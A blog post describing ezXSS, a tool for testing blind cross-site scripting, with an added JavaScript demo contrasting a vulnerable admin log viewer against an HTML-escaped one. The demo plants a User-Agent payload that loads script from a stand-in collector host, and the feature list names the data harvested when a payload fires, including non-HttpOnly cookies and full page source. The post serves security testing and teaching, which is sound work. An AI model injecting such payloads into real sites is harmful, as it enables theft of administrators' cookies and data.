
ezXSS: Test Blind Cross Site Scripting
Category : Blog
Blind Cross Site Scripting
Blind cross-site scripting (BXSS) is a variation of stored XSS in which the injection point and the execution point are different: the payload is submitted through one interface (a contact form, a support ticket, a logged HTTP header such as User-Agent or Referer) and fires later in another user's browser, typically an administrator viewing a back-office page. It is harder to find and requires a different methodology from testing for stored (non-blind), reflected, or DOM-based XSS.
With ordinary stored XSS the payload executes on the same page it was injected into, so the tester sees it fire. With blind XSS the tester never sees the execution, so the payload itself has to report back to a server the tester controls.
ezXSS: Test Blind Cross Site Scripting
ezXSS is an easy way to test blind Cross Site Scripting.
Cross-site scripting (XSS) is a client-side code injection attack in which an attacker gets malicious script (often called the payload) executed in the context of a legitimate website or web application. XSS is among the most common web application vulnerabilities and occurs when an application places unvalidated or unencoded user input into the output it generates.
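To make the "injection point versus execution point" distinction concrete, here is an added example (not code from ezXSS or from the original post) that models a blind stored XSS in plain JavaScript: a visitor's User-Agent header is stored by the public site (injection point) and later rendered in an admin log viewer (execution point). `renderLogVulnerable` concatenates the stored string straight into HTML; `renderLogSafe` HTML-encodes it. The collector host `collector.example` and the request data are constructed placeholders.

```javascript
// Added example, not ezXSS's own code. Models blind stored XSS: a header is
// stored on one page and rendered on another that the attacker never sees.

const COLLECTOR = "https://collector.example/ez"; // assumed callback host

// Constructed visitor request: the tester plants a script-loading payload in
// a header that is never reflected to the tester, only to an admin later.
const visitorRequest = {
  ip: "203.0.113.7",
  path: "/login",
  userAgent: `Mozilla/5.0 "><script src="${COLLECTOR}"></script>`,
};

// In-memory stand-in for the access-log table.
const accessLog = [];

// Injection point: the public site logs the raw header value.
function logRequest(req) {
  accessLog.push({ ip: req.ip, path: req.path, ua: req.userAgent });
}

// Execution point, vulnerable: raw string concatenation into HTML.
function renderLogVulnerable(rows) {
  return rows
    .map((r) => `<tr><td>${r.ip}</td><td>${r.path}</td><td>${r.ua}</td></tr>`)
    .join("\n");
}

// HTML-encode the five characters that matter in text and attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Execution point, hardened: every stored field is encoded before output.
function renderLogSafe(rows) {
  return rows
    .map((r) =>
      `<tr><td>${escapeHtml(r.ip)}</td><td>${escapeHtml(r.path)}</td>` +
      `<td>${escapeHtml(r.ua)}</td></tr>`)
    .join("\n");
}

// Crude demo check: does the rendered HTML contain an unencoded <script>
// tag that a browser would execute?
function containsLiveScript(html) {
  return /<script\b[^>]*>/i.test(html);
}

logRequest(visitorRequest);
console.log("vulnerable viewer executes payload:",
  containsLiveScript(renderLogVulnerable(accessLog)));
console.log("hardened viewer executes payload:",
  containsLiveScript(renderLogSafe(accessLog)));
```

The tester who sent `visitorRequest` gets a normal login page back and sees nothing; the payload only runs when an administrator opens the log viewer, which is why the payload has to phone home rather than rely on the tester observing it.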
Features of ezXSS:
- Easy-to-use dashboard with statistics, payloads, view/share/search reports and more
- Payload generator
- Instant email alert when a payload fires
- Custom JavaScript for extra testing
- Prevent duplicate payload fires from being saved or alerted on
- Share reports with other ezXSS users
- Easily manage and view reports in the system
- Search for reports in no time
- Secure your system account with extra protection (2FA)
- The following information is collected on a vulnerable page:
  - The URL of the page
  - IP address
  - Any page referer (or share referer)
  - The User-Agent
  - All non-HttpOnly cookies
  - Full HTML DOM source of the page
  - Page origin
  - Time of execution
- it's just ez
Required
- PHP 5.5 or up
- A domain name (consider a short one, since the payload has to fit into whatever input field or header you are injecting into)
- A TLS certificate if you want to test HTTPS websites, because a payload loaded over plain HTTP on an HTTPS page is blocked by the browser as mixed content (Cloudflare or Let's Encrypt provide one for free)
Blind Cross-Site Scripting (XSS) Vulnerability Detection
XSS Hunter, a comparable tool, describes the same problem: blind XSS is a vulnerability where an XSS payload fires in another user's browser (such as an administrative panel, support system, or logging application) that you cannot "see", because it does not fire in your own browser. Both tools address this by recording extensive information about each payload fire in their database and alerting the tester when it happens.